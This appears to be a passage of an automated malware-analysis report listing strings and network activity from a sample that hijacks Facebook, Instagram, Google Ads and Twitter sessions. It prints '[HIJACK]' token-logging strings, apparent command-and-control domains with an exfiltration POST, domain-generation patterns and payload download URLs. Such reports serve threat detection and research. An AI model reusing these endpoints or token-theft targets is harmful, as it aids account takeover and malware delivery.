Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com_7 equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: ef6df4af06ba6896.xyz
Source: unknownHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz//
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/0
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/;
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/dbo
Source: 1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/ddd
Source: 1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/dddi_u
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/du
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/duer3xP
Source: 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/g
Source: 1E1C360C582DF797.exe, 00000015.00000003.574894827.0000000002559000.00000004.00000001.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/r
Source: 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/w
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/wlub
Source: 1E1C360C582DF797.exe, 00000015.00000003.563127695.0000000005DD4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCode
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmpString found in binary or memory: http://crl.usertrust.
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: 1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmpString found in binary or memory: http://crt.com
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: http://docs.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmpString found in binary or memory: http://dream.pics/setup_10.2_mix1.exe
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://dream.pics/setup_10.2_mix1.exe6b_x
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: http://dream.pics/setup_10.2_mix1.exeimet
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: http://drive.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://ef6df4af06ba6896.xyz/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://ef6df4af06ba6896.xyz/info/du
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://ef6df4af06ba6896.xyz/info/du.
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://ef6df4af06ba6896.xyz/info/du:
Source: aliens.exe, aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: h1GodtbhC8.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://ocsp.digicert.com0N
Source: 1E1C360C582DF797.exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0P
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.usertrus
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: 1607186572092.exe, 0000001C.00000002.546643482.0000000000198000.00000004.00000010.sdmp, 1607186588295.exe, 0000001D.00000002.580802111.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: 1E1C360C582DF797.exe, 00000015.00000002.824956152.0000000000196000.00000004.00000001.sdmpString found in binary or memory: http://www.sodown.xyz/in
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmpString found in binary or memory: http://www.sodown.xyz/index.exe
Source: 1E1C360C582DF797.exeString found in binary or memory: http://www.youtube.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com_7
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: https://.twitter.com/s
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info.
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: https://1C5491A87D65F1EF.club/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/up
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/upData
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmpString found in binary or memory: https://1C5491A87D65F1EF.club/Info_t/upycfa
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.650204925.0000000004190000.00000004.00000040.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 1E1C360C582DF797.exe, 00000019.00000003.640661487.0000000005CB4000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.650204925.0000000004190000.00000004.00000040.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxU
